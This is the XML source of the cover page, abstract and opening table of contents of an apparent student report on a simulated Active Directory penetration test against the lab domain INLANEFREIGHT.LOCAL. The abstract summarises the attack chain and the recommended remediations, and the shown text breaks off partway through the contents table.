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2F30A" w14:textId="238F7B26" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="004C4181" w:rsidP="004C4181">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="494AB9F1" wp14:editId="7EA814F0">
            <wp:extent cx="1820637" cy="212407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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1840337" cy="2147058"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="527415C7" w14:textId="60FB6ED0" w:rsidR="004C4181" w:rsidRPr="0040297F" w:rsidRDefault="004C4181" w:rsidP="004C4181">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UNIVERSITY OF MINES AND TECHNOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D6FEB3" w14:textId="3153A5A1" w:rsidR="00A30730" w:rsidRPr="0040297F" w:rsidRDefault="00A30730" w:rsidP="004C4181">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FACULTY OF COMPUTING AND MATHEMATICAL SCIENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F92A2A5" w14:textId="4CD9A135" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A30730" w:rsidP="00A30730">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:t>DEPARTMENT OF CYBERSECURITY AND INFORMATION SYSTEMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17766FE2" w14:textId="703BDBFC" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8"/>
    <w:p w14:paraId="437345DD" w14:textId="77777777" w:rsidR="00A30730" w:rsidRPr="0040297F" w:rsidRDefault="00A30730"/>
    <w:p w14:paraId="35AEDFB5" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CY376: NETWORK MONITORING, SECURITY AND AUDITING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09726630" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Simulated Privilege Escalation &amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C6F551" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>An Assumed-Breach Active Directory Penetration Test and Attack-Chain Assessment of INLANEFREIGHT.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3168"/>
        <w:gridCol w:w="6192"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="743ED0A8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5FBDC88A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Assessment Type:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6192" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0EC3451B" w14:textId="14B9053E" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="56CBC5E9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28D7B18C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Student Name:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6192" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="75C30CB7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Enoch Nana Tabi Oduro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="3BB31B4C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6274582E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Index Number:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6192" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2467C311" w14:textId="70F05E3E" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="004C4181">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>FCM.41.018.197.23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="367F916F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="612B0E52" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Course Code:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6192" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4BD14637" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CY376 (Network Monitoring, Security &amp; Auditing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="2A817822" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56FB26EA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Submission Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6192" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C10C5CE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Monday, 3rd August 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="6CF27B95" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43EA736A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>GitHub Repository:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6192" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="145A72CA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>https://github.com/Mazonia/privilege-escalation-n-dom-compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D7BF8EB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:r w:rsidRPr="0040297F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08091788" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD86CCF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>This report presents the findings, methodology, technical execution, and strategic recommendations resulting from a simulated internal penetration test conducted against the Active Directory domain INLANEFREIGHT.LOCAL. Operating under an assumed-breach threat model, the Red Team assessment initiated with a single low-privileged domain credential (hporter) and systematically identified, enumerated, and chained multiple security misconfigurations across the Active Directory environment. The assessment demonstrated how seemingly minor, decoupled configuration oversights - such as excessive Access Control List (ACL) delegations, cleartext credential storage on accessible network file shares, uncleaned deployment answer files, vulnerable third-party local services, cleartext LSA autologon registry secrets, targeted Kerberoasting via GenericWrite permissions, and unmonitored directory replication rights - can be combined by a motivated adversary to achieve complete, unrestricted domain compromise (DCSync) without triggering traditional anti-virus or perimeter defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD32814" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Throughout the 12-stage attack chain narrative, empirical evidence - including full command execution syntax, network captures, and annotated screenshots - is provided to substantiate each privilege escalation step. The evaluation highlights that zero-day vulnerabilities were unnecessary for total domain compromise; rather, native Windows functionality, misconfigured delegations, and credential hygiene failures were fully leveraged. Finally, this document outlines a prioritized remediation roadmap aligned with the CIS Controls for Active Directory Security and MITRE ATT&amp;CK mitigation strategies, emphasizing Tiered Administration, Privileged Access Management (PAM), Group Managed Service Accounts (gMSAs), LSA Protection (RunAsPPL), and strict replication rights auditing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB549CE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:r w:rsidRPr="0040297F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD22B4" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02891615" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>The following table outlines the main sections and subsections of this report:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7920"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="1EB57E1A" w14:textId="77777777" w:rsidTr="00B36735">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6020CA11" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Section Heading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="64F4CEFC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="4817A187"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33B37C25" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Abstract</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="07AE62F9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="30521301"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4D9CA54A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Table of Contents &amp; List of Figures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0D7DDB48" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="7B82ABFF"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57AFC988" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1. Introduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DD33AC7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="1427B133"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5F0D4F52" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   1.1 Background &amp; Threat Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
